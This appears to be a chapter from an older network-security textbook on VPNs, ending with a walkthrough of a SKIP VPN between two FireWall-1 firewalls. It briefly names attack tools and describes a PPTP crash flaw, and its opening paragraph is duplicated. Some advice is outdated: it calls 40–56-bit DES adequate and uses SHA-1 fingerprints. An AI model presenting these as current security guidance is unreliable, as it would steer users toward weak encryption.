Figure 10.1: An example of a VPN between two Internet sites

In Figure 10.1, the devices at each end of the VPN tunnel are the routers you are using to connect to the Internet. If these are Cisco routers, they are capable of supporting IPSec, which provides Diffie-Hellman authentication and 40-bit DES encryption.

The router on Network A must be configured so that all outbound traffic headed for the 192.168.2.0 subnet is encrypted using DES. This is known as the remote encryption domain. The router on Network A also must know that any data received from the router on Network B will require decryption. The router on Network B would be configured in a similar fashion, encrypting all traffic headed for the subnet 192.168.1.0 while decrypting any replies received from the router on Network A. Data sent to all other hosts on the Internet is transmitted in the clear. It is only communications between these two subnets that will be encrypted.
Figure 10.1: An example of a VPN between two Internet sites

In Figure 10.1, the devices at each end of the VPN tunnel are the routers you are using to connect to the Internet. If these are Cisco routers, they are capable of supporting IPSEC, which provides Diffie-Hellman authentication and 40-bit DES encryption.

The router on Network A must be configured so that all outbound traffic headed for the 192.168.2.0 subnet is encrypted using DES. This is known as the remote encryption domain. The router on Network A also must know that any data received from the router on Network B will require decryption. The router on Network B would be configured in a similar fashion, encrypting all traffic headed for the subnet 192.168.1.0 while decrypting any replies received from the router on Network A. Data sent to all other hosts on the Internet is transmitted in the clear. Only communications between these two subnets will be encrypted.

Note: A VPN only protects communications sessions between the two encryption domains. It is possible to set up multiple VPNs, but you must define a separate encryption domain for each of them.

With some VPN configurations, a network analyzer placed between the two routers would display all packets using a source and destination IP address of the interfaces of the two routers. You do not get to see the IP address of the host that actually transmitted the data, nor do you see the IP address of the destination host. This information is encrypted along with the actual data within the original packet. Once the original packet is encrypted, the router encapsulates this ciphertext within a new IP packet, using its own IP address as the source and a destination IP address of the remote router. This is called tunneling. Tunneling helps to insure that a snooping attacker will not be able to guess which traffic crossing the VPN is worth trying to crack, since all packets use the two routers' IP addresses. Not all VPN methods support this feature, but it is nice to use when it is available.

Since you have a virtual tunnel running between the two routers, you have the added benefit of being able to use private address space across the Internet. For example, a host on Network A would be able to transmit data to a host on the 192.168.2.0 network without requiring network address translation. This is because the routers encapsulate this header information as the data is delivered along the tunnel. When the router on Network B receives the packet, it simply strips off the encapsulating packet, decrypts the original packet, and delivers the data to the destination host.

Your VPN also has the benefit of being platform and service independent. In order to carry on secure communications, your workstations do not have to use software that supports encryption. Encryption is performed automatically as the traffic passes between the two routers. This means that services such as SMTP, which are transmitted in the clear, can be used in a secure fashion—provided the destination host is on the remote encryption domain.
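The encapsulation step just described can be sketched conceptually in Python. This is an illustration of the tunneling pattern only: the Fernet cipher stands in for whatever algorithm the routers actually negotiate (DES in the example above), and the router addresses are invented for the sketch.

from cryptography.fernet import Fernet  # stand-in cipher, not DES/IPSEC

key = Fernet.generate_key()             # secret shared by the two routers
cipher = Fernet(key)

# Inner packet: the true endpoints' addresses travel *inside* the ciphertext.
inner_packet = b"src=192.168.1.10 dst=192.168.2.10 proto=TCP payload=..."

# Tunnel encapsulation: encrypt the whole inner packet, then wrap it in a
# new packet that exposes only the two routers' addresses to the Internet.
outer_packet = {
    "src": "198.51.100.1",              # illustrative router addresses
    "dst": "203.0.113.1",
    "data": cipher.encrypt(inner_packet),
}

# Receiving router: strip the outer header, decrypt, deliver the original.
recovered = cipher.decrypt(outer_packet["data"])
assert recovered == inner_packet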
VPN Usage
Although VPNs are beginning to enjoy wide deployment, there are only two specific applications for which they are commonly used:
• Replacement for dial-in modem pools
• Replacement for dedicated WAN links

A VPN can replace the listed technology completely or only in specific situations. This limited range of application is largely due to the amount of manual configuration required to set up a VPN. As technology evolves, you may see this process become more dynamic. For example, two IPSEC-compatible routers might dynamically handshake and exchange keys before passing SMTP traffic; when the delivery process is complete, the VPN could be torn down. While this technology is not currently on the horizon, it is certainly possible.

Modem Pool Replacement
Modem pools have always been the scourge of the network administrator. While there are stable solutions available, these are usually priced beyond the budget of a small to mid-sized organization. Most of us end up dealing with modems that go off auto-answer, below-grade wiring, incorrectly configured hunt groups, and the salesperson who is having trouble dialing in because little Timmy deleted some files to make room for another game. For anyone who has been responsible for administering a modem pool, the thought of getting rid of such headaches can bring tears of joy.

A VPN solution for remote users can dramatically reduce support costs. There are no more phone lines to maintain or 800 numbers to pay for. You are not required to upgrade your hardware every time a new modem standard is released or to upgrade your phone lines to support new technology, such as ISDN. All inbound access is managed through your Internet connection, a connection your company already maintains in order to do business on the Internet.

Access costs can be cheaper, as well. For example, many organizations maintain an 800 number in order to allow employees remote access to the network free of charge. This can place a large cost burden on the organization, as the per-minute charge for using an 800 number can be double the cost of calling direct. Most ISPs charge $20 per month or less for unlimited access. Large ISPs, such as CompuServe, can even provide local dial-up numbers internationally. For heavy remote access users, it may be far more cost effective for an organization to reimburse the employee for an ISP account than to pay 800-number charges.

Besides reducing infrastructure costs, you can reduce end-user support costs, as well. The most common remote-access Helpdesk problem is helping the end user configure network settings and connect to the network. If the user first needs to dial in to an ISP, this support can be provided by the ISP. Your organization's Helpdesk only needs to get involved when the user can access resources out on the Internet but is having problems connecting to internal resources. This greatly limits the scope of required support.

Tip: When selecting a firewall solution, consider whether you will be providing end users with remote VPN access. Most firewall packages provide special client software so that an end user can create a VPN to the firewall.

There are a few drawbacks to consider when deciding whether to provide end users with remote VPN access. The first is the integrity of the remote workstation. With penetration tools such as L0pht's Netcat and the Cult of the Dead Cow's Back Orifice freely available on the Internet, it is entirely possible for the remote workstation to become compromised. Most ISPs do not provide any type of firewall for dial-in users, which means that dialed-in systems are wide open to attack. The remote client could be infiltrated by an attacker, who could then use the VPN tunnel to attack internal resources.

The other drawback is more theoretical. Allowing VPN access into your network requires that you punch another hole through your firewall, and every open hole gives attackers that much more room to squirm their way in. For example, NT users who relied on PPTP to provide safe encrypted access to their network were caught off guard when a vulnerability was found in the PPTP service running on the NT server. By sending the PPTP server a single PPTP start-session request with an invalid packet length value, an attacker could make the server core dump and crash. This would bring down the PPTP server, along with any other service running on that system.

Dedicated WAN Link Replacement
As you saw in Figure 10.1, a VPN can be used to connect two geographically separate networks over the Internet.
This is most advantageous when the two sites are separated by large distances, as when your organization has one office in Germany and another in New York. Instead of having to pay for a dedicated circuit halfway around the world, each site is only required to connect to a local ISP. The Internet can then be used as a backbone to connect these two networks.

A VPN connection may even be advantageous when two sites are relatively close to one another. For example, if you have a business partner with whom you wish to exchange information, but the expected bandwidth does not justify a dedicated connection, a VPN tunnel across an already existing Internet connection may be just the ticket. In fact, it may even make life a bit easier.

System Capacity Checklist
If you will be providing client VPN access to your network, keep a sharp eye on system capacity. Here are some questions you should ask yourself:
• How many concurrent users will there be? More users means you need more capacity.
• When will VPN clients connect remotely to your network? If most remote VPN access will take place during normal business hours, a faster Internet link and faster hardware may be required.
• What services will the clients be accessing? If remote VPN access will be used for bandwidth-intensive applications like file sharing, a faster Internet link and faster hardware may be required, as well.
• What kind of encryption do you plan to use? If remote VPN access will use a large-key algorithm, such as Triple DES, then faster encryption hardware may be required.

Consider the network drawing in Figure 10.2. There is an internal network protected by a firewall. There is also a DMZ segment which holds your Web server and SMTP relay. Additionally, you have an extra network card in the firewall for managing security on a number of dedicated T1 lines. The T1 circuits connect you to multiple business partners and are used so that sensitive information does not cross the Internet. This sensitive information may be transmitted via e-mail or by FTP.

Figure 10.2: A network using dedicated links to safeguard sensitive information

While this setup may appear pretty straightforward on the surface, it can potentially run into a number of problems. The first is routing. Your firewall would need to be programmed with the routing information for each of these remote networks; otherwise, it would simply refer to its default route setting and send this traffic out to the Internet. While these routing entries can be set in advance, how will you be updated if one of the remote networks makes a routing or subnet change? While you could use RIP, you have already seen in Chapter 3 that RIP is a very insecure routing protocol. Open Shortest Path First (OSPF) would be a better choice, but depending on the equipment at the other end of the link, you may not have the option of running OSPF.

You may also run into IP address issues. What if one of the remote networks is using NAT with private address space? If you perform a DNS lookup on one of these systems, you will receive the public IP address, not the private one. This means that you may have additional routing issues, or you may be required to maintain DNS entries for these systems locally. Also, what if two or more of the remote networks are using the same private address space?
You may now be forced to run NAT on the router at your end of the connection just so your hosts can distinguish between the two networks.

There is also a liability issue here. What if an attacker located at one of your remote business partners launches an attack against one of the other remote business partners? You have now provided the medium required for this attack to take place. Even if you can legally defend yourself, this would certainly cause a lot of embarrassment and strain your business relationships.

Replacing your dedicated business partner connections with VPNs would resolve each of these problems. As long as you can insure the integrity of the data stream, administering multiple VPNs would be far simpler than managing multiple dedicated circuits.

As with remote client access, you must open a hole through your firewall in order to permit VPN traffic. While strong authentication will dramatically decrease the chances that an attacker will be able to exploit this hole, it is a hole in your perimeter security just the same.

Selecting a VPN Product
When deciding which VPN product to use, you should look for several features:
• Strong authentication
• Adequate encryption
• Adherence to standards
• Integration with other network services

Of course, this assumes that you have a choice when selecting a VPN product. If you are setting up a VPN in order to connect to a specific site, your options may be limited. For example, Novell's firewall product BorderManager supports VPN connectivity, but the VPN is proprietary: the only way to create a VPN with a BorderManager firewall is to place another BorderManager firewall at the other end of the VPN tunnel. If you are setting up a VPN in order to communicate with a specific remote network, find out what VPN package that network is using. Then you can determine what your product options are.

Strong Authentication
Without strong authentication, you have no way to determine whether the system at the other end of the VPN tunnel is who you think it is. Diffie-Hellman, discussed in Chapter 9, is the method of choice for validating the tunnel end points. It allows a shared secret to be created through the exchange of public keys, which removes the need to exchange secret information through some alternative means.

Tip: If you are not using a known and trusted certificate authority when exchanging public keys over the Internet, verify the key values through some other means, such as a phone call or fax.
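A common way to verify key values out of band is to compare a short fingerprint rather than reading the full key aloud. Here is a minimal sketch; the function name is illustrative, and it assumes you can export the peer's public key as raw bytes from your VPN product.

import hashlib

def key_fingerprint(public_key_bytes: bytes) -> str:
    """Return a short, human-readable digest that two administrators
    can compare over the phone or by fax."""
    digest = hashlib.sha1(public_key_bytes).hexdigest().upper()
    # Group into 4-character blocks for easier reading aloud.
    return " ".join(digest[i:i + 4] for i in range(0, len(digest), 4))

# Illustrative key material -- in practice, export it from your VPN product.
print(key_fingerprint(b"...remote gateway public key..."))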
Adequate Encryption
Note that the word "adequate"—not "strong"—appears in the title of this section. You should determine what level of protection you actually require before selecting a method of encryption. For example, if you will be exchanging interesting but not necessarily private information over the Internet, 40- to 56-bit DES encryption may be more than sufficient. If you will be moving financial data or equally valuable information, stick with something stronger, like Triple DES.

The reason you want to choose the right level of encryption is performance: the stronger the encryption algorithm you use, the larger the delay introduced by the encryption and decryption processes. For example, two networks connected to the Internet via 56K circuits which are using Triple DES may not be able to pass traffic fast enough to prevent application timeouts. While it is always better to err on the side of caution by using a larger key, give some thought to what size key you actually need before assuming bigger is always better.

The type of key you use will also affect performance. Secret key encryption, such as DES, is popular with VPNs because it is fast. Public/private encryption schemes, such as RSA, can be 10 to 100 times slower than secret key algorithms using the same size key, because key management with a public/private scheme requires more processor time. Many VPN products will therefore use a public/private key algorithm to initially exchange the secret key, but then use secret key encryption for all future communications.

Tip: Use the brute force attack time estimates discussed in Chapter 9 as a guide in determining what size encryption key to use with your VPN.
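The hybrid approach described above can be sketched with Python's cryptography package. This illustrates the pattern only, not any particular VPN product: RSA-OAEP and the Fernet cipher stand in for whatever key-exchange and bulk ciphers the product actually negotiates.

from cryptography.fernet import Fernet
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# The receiving gateway owns a public/private key pair.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

# 1. The sender generates a fresh secret (session) key...
session_key = Fernet.generate_key()

# 2. ...and ships it under the slow public/private algorithm, one time only.
oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)
wrapped_key = public_key.encrypt(session_key, oaep)

# 3. All further traffic uses the fast secret-key cipher.
ciphertext = Fernet(session_key).encrypt(b"bulk VPN traffic...")

# The receiver unwraps the session key once, then decrypts everything cheaply.
recovered_key = private_key.decrypt(wrapped_key, oaep)
assert Fernet(recovered_key).decrypt(ciphertext) == b"bulk VPN traffic..."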
Adherence to Standards
You saw in Chapter 9 why it is important to stick with encryption schemes that have survived public scrutiny. The same holds true when selecting a method of encryption for your VPN. Stick with an algorithm that has stood the test of time and has no significant vulnerabilities. For example, the only real deficiency found in DES is the small key size used in the original version. This is easily rectified by using Triple DES, which increases the effective key length by applying the algorithm multiple times with different keys.

You should also make sure that the VPN product is compatible with other VPN solutions. As mentioned earlier in this section, Novell BorderManager is only capable of creating VPN connections with other BorderManager systems. This severely limits the product selection at the other end of the tunnel. If you are using BorderManager as a firewalling solution and later need to create a VPN to a remote business partner, you may find yourself purchasing a separate solution to fulfill this need.

Integration with Other Network Services
Newer VPN solutions have the capability to integrate with other services, including firewalls, user directories, and monitoring software. Check Point's VPN-1 is completely integrated into the entire Check Point management suite, allowing not just complete security integration but also address translation and bandwidth allocation. The ability to centrally manage the authentication of VPN connections, as well as to control how much bandwidth each connection is allowed, is a powerful feature.

Of course, the ideal VPN solution would integrate with products from a different vendor. So far, success has been limited—although newer products are including industry standards such as LDAP and Triple DES.

Microsoft is one example. They have included a VPN solution within their Windows 2000 product. The advantage, of course, is the integration of encryption and authentication technologies with Active Directory. Some vendors (such as Check Point) can mix their own VPN products with Microsoft VPN, allowing one centrally defined VPN policy to be applied equally to Microsoft and vendor-specific VPN access points. Also, because Active Directory is LDAP-compliant, third-party VPNs can base VPN permissions on the user account information stored in Active Directory.

VPN Product Options
There are a number of options available when you are selecting what kind of device to use for a VPN connection. These options fall into three categories:
• Firewall-based VPN
• Router-based VPN
• Dedicated software or hardware

The option you choose will depend on your requirements, as well as on the equipment you have already purchased.

Firewall-Based VPN
The most popular VPN solution is firewall integration. Since you will probably want to place a firewall on your network perimeter anyway, it is a natural extension to let this device support your VPN connections, as well. This provides a central point of management as well as direct cohesion between your firewall security policy and the traffic you wish to let through your end of the tunnel.

The only drawback is performance. If you have a busy Internet circuit, and you want to run multiple VPNs with strong encryption on all of them, consolidating all of these services on a single box may overload the system. While this will probably not be an issue for the average installation, keep scale and performance in mind while you are deciding where to terminate your VPN tunnel. Some firewalls, such as FireWall-1, support encryption cards in order to reduce processor load. The encryption card fits in a standard PCI expansion slot and takes care of all traffic encryption and decryption. In order to use one of these cards, however, you must have a PCI slot that is not already occupied by a network card.

Router-Based VPN
Another choice is your Internet border router. This is yet another device that you need to have installed in order to connect to the Internet. Terminating the VPN at your border router allows you to decrypt the traffic stream before it reaches the firewall. While processor load is still a concern, many routers now use application-specific integrated circuit (ASIC) hardware. This allows the router to dedicate certain processors to specific tasks, preventing any one activity from overloading the router.

The only real drawback to a router-based VPN solution is security. Typically (but not always), routers are extremely poor at providing perimeter security compared to the average firewall. It is possible that an attacker may be able to spoof traffic past the router that the firewall will interpret as originating from the other side of the VPN tunnel. This means that the attacker may be able to gain access to services that are typically not visible from other locations on the Internet.

Dedicated Hardware or Software
If you have already purchased a firewall and router and neither supports VPN capability, all is not lost. You can still go with a hardware or software solution that is dedicated to creating VPN connections. For example, DEC's AltaVista Tunnel is an excellent product which supports tunnels to remote networks and remote-user VPNs. Since this is an independent product, it will work with any existing firewall.

The biggest drawback to a dedicated solution is an additional point of administration and security management. If the device is located outside the firewall, you have the same spoofing issues that you had with the router solution. If you locate the device inside the firewall, you may not be able to manage access using your firewall security policy.
Most VPN solutions encrypt the original packet in its entirety, which means that the IP header information is no longer available to the firewall for making traffic-control decisions. All traffic passing from one end of the tunnel to the other uses the same encapsulating packet headers, so the firewall cannot distinguish between, say, an SMTP session and a telnet session encapsulated within the tunnel. You must rely on the dedicated VPN device to provide tools to control the type of traffic you wish to let through your end of the tunnel.

VPN Alternatives
Not every remote-access solution requires a fully functional VPN. Some applications already provide strong encryption and authentication. For example, if you are a Lotus Notes user, your Notes ID file is actually your private encryption key. This key can be used to create a digital certificate, which, along with password authentication, is used to insure that you are in fact who you claim to be.

Lotus Notes will also encrypt information that it transmits along the network. From the Lotus Notes client main menu, you can select File > Tools > User Preferences > Ports to produce the User Preferences screen shown in Figure 10.3. By selecting the Encrypt network data check box, you can optionally encrypt all data transmitted through the highlighted communication port. In Figure 10.3, all TCP/IP traffic will be encrypted.

Figure 10.3: The Lotus Notes User Preferences screen

If your remote network access will be limited to Lotus Notes replication, you could simply open a port through your firewall and allow Lotus Notes to take care of all authentication and encryption for you. If you do not want to leave the Lotus Notes server openly exposed to the Internet, you could force all inbound sessions to authenticate at the firewall first (if your firewall supports this ability). This means that until you authenticate at the firewall, the Lotus Notes server remains inaccessible. Once you have passed the firewall authentication, you still need to pass the Notes authentication before you are allowed access to data on the server.

Note: Lotus Notes uses TCP port 1352 for all client-to-server and server-to-server communications.

Quite a few products provide their own authentication and encryption. Some even allow access to additional network resources. For example, Citrix's WinFrame and MetaFrame products provide terminal server capability based on the Windows NT operating system. They also support decent authentication and encryption. This means that users on the Internet can use a Citrix client to access the Citrix server through an encrypted session. Once connected to the server, users can access any internal applications to which the system administrator has granted them access.

The biggest drawback to these alternative solutions is that they require special software to be run on the client in order to initiate the connection; you no longer have the service independence of a true VPN solution. This is changing, however, as vendors like Citrix work to make their products more universally accessible. For example, the latest versions of WinFrame and MetaFrame no longer require a specialized client. You can now use an optional Web browser plug-in which supports the latest versions of Netscape and Internet Explorer.
Tip: A browser plug-in makes an excellent remote solution: a network administrator simply needs to make the plug-in software and configuration file available via a Web server. Remote users can then download the required software (about 300KB) and connect to the Citrix server using their favorite Web browser.

Setting up a VPN
Let's return to the FireWall-1 product we discussed in Chapter 7 and walk through the configuration of a VPN between two remote networks. While we will specifically be discussing FireWall-1, many of the required steps are similar in other products' setups. The goal is to give you a firm understanding of what is involved in the configuration process, not to endorse one product over another.

As mentioned in Chapter 7, FireWall-1 supports a number of VPN options, including SKIP, IPSEC, and a FireWall-1 proprietary algorithm. In our example, we will be working with SKIP, since it provides better authentication than IPSEC (although current trends point to the integration of SKIP capabilities into IPSEC) and is an accepted standard. It also supports full tunneling, which allows SKIP to be used in a private address space environment.

Preparing the Firewall
Note: If you are unfamiliar with FireWall-1, please review Chapter 7, which covers how to install and configure the product.

This section assumes that you have a working firewall which is capable of providing controlled Internet access. In the course of this procedure, you will notice that the firewall policy has a minimal number of rules. This has been done solely for clarity in our examples. Your rule set will vary and should include all required policies.

Tip: Place encryption rules at the top of the Policy Editor so they will be processed first.

Our VPN Diagram
Figure 10.4 shows a network drawing of the VPN you will create. The figure shows two remote network sites. One is behind a firewall named HOLNT200, and the other is behind a firewall named Witchvox. Behind HOLNT200 is an FTP server that holds files containing financial information. The goal is to set up a secure tunnel so that clients on the other side of Witchvox can retrieve the financial files in a secure manner. Since FTP transmits all data in the clear, you want to use a VPN to insure that your financial information is not compromised.

Figure 10.4: An example of a VPN

Configure your VPN by defining encryption domains for each end of the VPN tunnel. This identifies which remote networks the firewall will exchange encrypted traffic with. For example, you will configure the firewall Witchvox to encrypt any traffic headed for the 192.168.1.0 network. Conversely, you will also instruct Witchvox to decrypt all traffic received from the 192.168.1.0 network. HOLNT200 will be configured in a similar manner, except that its remote encryption domain is defined as 192.168.3.0.
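The encryption-domain decision each firewall makes can be expressed in a few lines of Python. This is a conceptual sketch of the matching logic from Witchvox's point of view, not FireWall-1 code; the second address in the final check is arbitrary Internet traffic.

from ipaddress import ip_address, ip_network

# Witchvox's view of the tunnel (from the diagram in Figure 10.4):
LOCAL_DOMAIN = ip_network("192.168.3.0/24")    # subnet behind Witchvox
REMOTE_DOMAIN = ip_network("192.168.1.0/24")   # subnet behind HOLNT200

def must_encrypt(src: str, dst: str) -> bool:
    """Outbound traffic from the local domain to the remote domain
    belongs in the tunnel; everything else goes out in the clear."""
    return (ip_address(src) in LOCAL_DOMAIN
            and ip_address(dst) in REMOTE_DOMAIN)

assert must_encrypt("192.168.3.10", "192.168.1.10")      # FTP to the file server
assert not must_encrypt("192.168.3.10", "198.51.100.9")  # ordinary Internet traffic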
Configuring Required Network Objects
Your first step is to make sure all required network objects are created. Each firewall will need the following objects:
• A network object or group for the local encryption domain
• A network object or group for the remote encryption domain
• A workstation object for itself
• A workstation object for the remote firewall

Defining Network Objects
If you do not have a local network object defined, you will need to define one now. This can be accomplished from the Security Policy tab main menu by selecting Manage > Network Objects > New > Network. This will produce the Network Properties screen shown in Figure 10.5. Give this object a name and assign a valid subnet address and mask. Notice that this configuration is being performed on Witchvox, so the Location of the 192.168.3.0 network object is identified as Internal. Click OK to save this entry.

Figure 10.5: The Network Properties screen

If you have multiple network segments, define each of them now. Once you have defined all of your network objects, you will also need to create a group object and place each of these network objects inside it. Later on, you will need to define an encryption domain, and when identifying the domain, you will only be allowed to specify one object. If you need to identify multiple network segments, you can do so by specifying the group containing your network objects.

Once you have identified your internal subnets, you must also identify the subnets at the remote encryption domain. Do this by creating additional network objects, just as you did for your local segments. The only difference is that the Location of each object must be defined as External, as shown in Figure 10.6. In Figure 10.6, we are still configuring the Witchvox firewall, so the 192.168.1.0 object is part of the remote network. This is why it is identified as being external to the firewall.

Tip: You may also wish to assign the remote subnets a unique color so you do not confuse them with your local objects.

Figure 10.6: Remote subnets need to be defined as External.

Defining the Firewalls
You now need to configure the firewall objects. If you have not done so already, create a network object for the firewall by selecting Manage > Network Objects > New > Workstation from the Security Policy tab main menu. In Figure 10.7, you are still configuring the Witchvox firewall and creating a workstation object which will represent itself. Notice that the configuration uses the IP address of the external NIC on the firewall and that the Location is identified as Internal.

Figure 10.7: The General tab for the Witchvox firewall object

Next, click the Encryption tab to define your local encryption domain and select a method of encryption. This is shown in Figure 10.8. Notice that Other is selected under Encryption Domain, with the local network object specified, and that SKIP has been selected under Encryption Schemes Defined.

Figure 10.8: The Encryption tab for the Witchvox firewall object

Once you have selected SKIP encryption, click the Edit button. This will produce the SKIP Properties window shown in Figure 10.9. Notice that there is no key information recorded in this tab. You will need to generate a new certificate authority key in order to authenticate with remote systems.
In this configuration, Local is identified as the certificate authority. If you wanted to indicate a different system, you would select Remote and choose a predefined object for the certificate authority.

Figure 10.9: The CA Key tab of SKIP Properties

Click the Generate button to create a new certificate authority key (CA key) for this system. This produces a dialog box warning you that you are about to change your SKIP management key. If you already had VPN connections with other sites, they would have to manually fetch the new key. Since this is a new configuration, changing keys is not an issue. Click Yes to continue.

Clicking Yes will produce a new dialog box informing you that a new management key is being generated. Depending on the processor speed of your system, this could take a few seconds or as long as a minute. Figure 10.10 shows the CA Key tab after key generation. These keys are unique to this specific system; the keys you generate will have different values.

Figure 10.10: The CA Key tab after key generation

Once the certificate authority keys are generated, select the DH Key tab to generate a new Diffie-Hellman key. This tab resembles the CA Key tab. Click the Generate button to create a new Diffie-Hellman key. Once key generation is complete, your screen should appear similar to Figure 10.11.

Note: Like the certificate authority keys, your Diffie-Hellman key will be unique to your system, so you will not receive an identical key string to the one shown in the figure.

Once you have finished, click the Write button to save this key, then click OK.

Figure 10.11: The DH Key tab for SKIP Properties

Now that you have configured an object for your local firewall, you also need to define an object for the firewall at the other end of the VPN tunnel. This is shown in Figure 10.12. You are still working on Witchvox, but you are defining an object for the firewall HOLNT200. Notice that the system is being associated with its external IP address and that the Location is identified as External.

Figure 10.12: General properties for the HOLNT200 firewall object

Once the General tab is filled out, click OK to save. You will not be working with the Encryption tab on the HOLNT200 object until you have also defined objects on the remote firewall. You can now click Close on the Network Objects screen and install these objects onto the firewall. Do this by selecting Policy > Install from the Security Policy tab main menu.

Configuring the Remote Firewall
Now that you have defined the required objects on Witchvox, you also need to define these objects on HOLNT200. The process is identical to the steps you have taken so far, with the following exceptions:
• The 192.168.1.0 subnet will be defined as Internal, not External.
• The 192.168.3.0 subnet will be defined as External, not Internal.
• The HOLNT200 firewall will be defined as Internal, not External.
• Keys will be generated for the HOLNT200 object, not Witchvox.
• Witchvox will be defined as External, not Internal.

Once these objects are created, install them on HOLNT200 by selecting Policy > Install from HOLNT200's Security Policy tab main menu.

Exchanging Keys
In order to exchange keys, go back to the Witchvox firewall and edit the object you created for HOLNT200.
When the Workstation Properties screen for HOLNT200 appears, select the Encryption tab. Under the Encryption Domain option, associate the object you created for the 192.168.1.0 network (the remote network which sits behind HOLNT200). You should also select SKIP under Encryption Schemes Defined. Your dialog box should appear similar to Figure 10.13.

Figure 10.13: Encryption properties for the remote firewall HOLNT200

When you click the Edit button to manage your SKIP properties, you will notice that the screen looks a little different from the same screen on the Witchvox object. This is shown in Figure 10.14. Instead of the certificate authority being defined as a local system, Remote is selected, with the HOLNT200 object chosen as the remote system. The Generate button is also missing; it has been replaced with a button labeled Get. This is because you will not be generating a new key, but fetching it from HOLNT200.

Figure 10.14: The CA Key tab for HOLNT200's SKIP Properties

Click the Get button now to retrieve the remote certificate. This will produce a dialog box warning you that the keys for HOLNT200 are being fetched without any authentication to certify that it is actually HOLNT200 sending them. This is normal: this is the first key exchange between the two systems, so you have no previous key information that can be used to authenticate the source.

You are also informed that you should manually verify the key values. You can do this by calling the remote firewall administrator and reading off the key values you have received. They should match the key values generated for that administrator's local firewall object. In our example, you could verify that the correct keys were received by going to the HOLNT200 firewall, editing the HOLNT200 object, and checking the SKIP properties under the Encryption tab.

Once you have retrieved the certificate authority keys, click the DH Key tab to fetch the Diffie-Hellman key. As on the CA Key tab, the Generate button has been replaced with a Get button. Click the Get button now to fetch the key from the remote firewall. Your screen should appear similar to Figure 10.15. As with the certificate authority key, you should manually validate the key value by calling the remote firewall administrator. Click the Write button and then click OK to save the changes you have made to this object.

Figure 10.15: The DH Key tab for HOLNT200's SKIP Properties

Fetching Keys on the Remote Firewall
Witchvox now has all the key information it needs from HOLNT200. You must now go to the HOLNT200 firewall and edit the Witchvox object so that HOLNT200 can fetch the key information it requires, as well. The process is identical to what you've done, except that the Encryption Domain defined under the Encryption tab of the Witchvox object must indicate the subnet 192.168.3.0 (the subnet sitting behind Witchvox). The rest of the steps are identical. Once HOLNT200 fetches the keys it needs, you should manually verify them, as well.

Modifying the Security Policy
You have created all of your required network objects and exchanged keys; now you must define a set of policy rules so that the firewall knows when to use your VPN.
This is done by creating a new rule at the top of the Policy Editor and adding both the local and remote networks to the Source and Destination columns. Under the Services column, you can leave the default of Any (which will encrypt all traffic between the two encryption domains) or you can choose to encrypt only certain services. In the Action column, right-click within the box and select Encrypt. Your rules should now appear similar to row 1 in Figure 10.16.

Note: Both the local and the remote encryption domains should appear in the Source and Destination columns.

Figure 10.16: Defining the rules about which traffic should be encrypted

Now you need to define the encryption properties for this specific VPN. This is done by again right-clicking in the Action box, only this time selecting Edit Properties. This will produce the Encryption Properties window shown in Figure 10.17. Since FireWall-1 supports multiple forms of encryption, it is possible to use different forms of encryption on multiple VPNs. This is why you must specify the type of encryption you wish to use for this VPN tunnel.

Figure 10.17: The Encryption Properties window

In the Encryption Properties window, select SKIP and click the Edit button. This will produce the SKIP Properties window shown in Figure 10.18. You are allowed to set the following options:

Kij Algorithm: Selects the method of encryption to use when the systems exchange Crypt and MAC keys.

Crypt Algorithm: Selects the method of encryption to use when encrypting and decrypting data.

MAC Algorithm: Selects the method of encryption to use for authenticating the system at the remote end of the VPN tunnel.

Allowed Peer Gateway: Specifies who is allowed to initiate a VPN transmission. If Any is selected, either firewall associated with each encryption domain is allowed to transmit encrypted data. If a specific system is indicated, you will need two separate rules in the Security Policy Editor.

NSID: Selects how the name space IDs are derived. Selecting None includes the NSID information within the encapsulation header.

IPSEC Options: One or both of these options must be selected if SKIP is used with IPSEC. The ESP option selects encryption, and the AH option selects authentication.

Figure 10.18: The SKIP Properties window

Once you have defined your SKIP options for this specific VPN connection, click OK twice to save any changes. This should return you to the Security Policy main screen. Now you must install your policy changes in order to make them active. Do this by selecting Policy > Install from the Security Policy tab main menu. This completes all the required changes to Witchvox for setting up your VPN connection.

Modifying the Security Policy on the Remote Firewall
You also need to modify the security policy and SKIP properties on HOLNT200. Follow the exact steps used to configure Witchvox. The policy rules should appear identical to Figure 10.16, and you want to make sure that you select the same options under SKIP properties. Once your policy changes are complete on HOLNT200, you must install the policy to make your changes active.
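Because the rule base is evaluated top-down and the first matching rule wins, placing the Encrypt rule first guarantees tunnel traffic is never caught by a broader rule below it. Here is a small sketch of that first-match behavior; the rule structure and names are illustrative, not FireWall-1 internals.

from ipaddress import ip_address, ip_network

# Rules are checked top-down; the first match decides the action.
# This mirrors why the Encrypt rule must sit at the top of the rule base.
RULES = [
    {"src": "192.168.3.0/24", "dst": "192.168.1.0/24",
     "service": "any", "action": "encrypt"},
    {"src": "any", "dst": "any", "service": "http", "action": "accept"},
    {"src": "any", "dst": "any", "service": "any", "action": "drop"},
]

def match(rule_net: str, addr: str) -> bool:
    return rule_net == "any" or ip_address(addr) in ip_network(rule_net)

def evaluate(src: str, dst: str, service: str) -> str:
    for rule in RULES:
        if (match(rule["src"], src) and match(rule["dst"], dst)
                and rule["service"] in ("any", service)):
            return rule["action"]
    return "drop"  # implicit cleanup rule

assert evaluate("192.168.3.10", "192.168.1.10", "ftp") == "encrypt"
assert evaluate("192.168.3.10", "10.1.1.1", "http") == "accept"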
Testing the VPN
The setup of your VPN should now be complete. All that is left is to test the VPN to verify that it is functioning properly. This is accomplished by initiating an FTP session from the 192.168.3.0 network behind Witchvox to the FTP server located behind HOLNT200. If you check the firewall log on Witchvox, you should see an outbound session similar to Figure 10.19. Log entry No. 1 shows an FTP session coming from 192.168.3.10 and going to 192.168.1.10, which is the IP address of the remote FTP server. Notice that the log indicates that the traffic is being encrypted.

Figure 10.19: The FTP log entry on Witchvox

So you know that your FTP session was transmitted successfully. You also need to check the firewall log on HOLNT200 to insure that the transmission was received properly. This is shown in Figure 10.20. Notice that the log indicates that the firewall had to decrypt this traffic. You may also notice that since the firewall knows the true name of the FTP server (LAB31), it has substituted this name for the destination IP address.

Figure 10.20: The FTP log entry on HOLNT200

Verifying the Data Stream
